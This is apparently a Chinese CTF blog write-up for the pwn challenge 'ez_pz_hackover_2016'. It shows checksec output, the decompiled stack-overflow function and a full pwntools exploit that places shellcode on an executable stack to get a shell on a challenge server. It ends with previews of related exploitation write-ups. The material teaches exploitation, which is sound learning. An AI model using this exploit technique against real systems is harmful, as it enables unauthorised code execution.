【ez_pz_hackover_2016】WriteUp

发表于2024-02-28|更新于2025-05-26|CTF

|总字数:211|阅读时长:1分钟|浏览量:

checksec发现NX保护未开启，因此可以考虑Ret2Shellcode。

[*] '/home/bronya/Documents/CTF/pwn17/ez_pz_hackover_2016'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments

ida查看，发现存在栈溢出漏洞，其中n=0x400，因此可以尝试向dest中写入shellcode。

void *__cdecl vuln(int src, size_t n)
{
  char dest[50]; // [esp+6h] [ebp-32h] BYREF

  return memcpy(dest, &src, n);
}

构造exp:

from pwn import *

context(arch='i386', log_level='debug')

# p = process('./ez_pz_hackover_2016')
# gdb.attach(p, 'b *0x0804865D')
p = remote('node4.buuoj.cn', 26972)

elf = ELF('./ez_pz_hackover_2016')
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']

shellcode = asm(shellcraft.sh())#生成shellcode，asm函数是进行汇编

p.recvuntil(b'Yippie, lets crash: 0x')
buf_addr = int(p.recv(8), 16) - 0x1c
print(hex(buf_addr))
shellcode_addr = buf_addr

payload = flat(b'crashme\x00', b'a'*(0x16-8), 0x0, shellcode_addr, shellcode)
p.sendlineafter(b'>', payload)

p.interactive()

文章作者: Eutopia

文章链接: https://eknight-eutopia.github.io/posts/478cb6ca.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Small Utopia！

Pwn Ret2Shellcode

相关推荐

【网络攻防大作业】Return_to_libc实验报告

1.环境搭建修改flag为学号构建docker镜像（运行sudo ./build.sh，注意chmod +x修改权限），连接不稳定，可能需要多次尝试开启docker，禁用ASLR。使用netstat -antp查看ssh服务状态登录容器ssh 0.0.0.0 -p 49153 -l seed 2. 漏洞利用运行镜像中vuln程序，vuln有setuid权限，因此可以尝试通过此来获取root shell。查看vuln源代码： 12345678910111213141516171819202122232425262728293031323334353637383940#include <stdlib.h>#include <stdio.h>#include <string.h>#ifndef BUF_SIZE#define BUF_SIZE 12#endifint bof(char *str){ char buffer[BUF_SIZE]; unsigned int *framep; ...

【ciscn_2019_es_2】WriteUp

checksec一下，发现只有NX防护。 123456[*] '/home/bronya/Documents/CTF/pwn11/ciscn_2019_es_2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 使用ida打开，发现s存在溢出漏洞，但是只能溢出8字节，无法调用write等函数进行RetLibc。因此考虑栈迁移。 12345678910int vul(){ char s[40]; // [esp+0h] [ebp-28h] BYREF memset(s, 0, 0x20u); read(0, s, 0x30u); printf("Hello, %s\n", s); read(0, s, 0x30u); return printf("Hello,...

【babyheap_0ctf_2017】WriteUp

checksec查看，保护全开，可以查看是否有堆的漏洞 123456[*] '/home/bronya/Documents/CTF/pwn18/babyheap_0ctf_2017' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ida查看： main函数提供了菜单以及选择功能 1234567891011121314151617181920212223242526272829__int64 __fastcall main(__int64 a1, char **a2, char **a3){ char *v4; // [rsp+8h] [rbp-8h] v4 = sub_B70(); while ( 1 ) { sub_CF4(); switch ( sub_138C() ) { ...

评论

数据加载中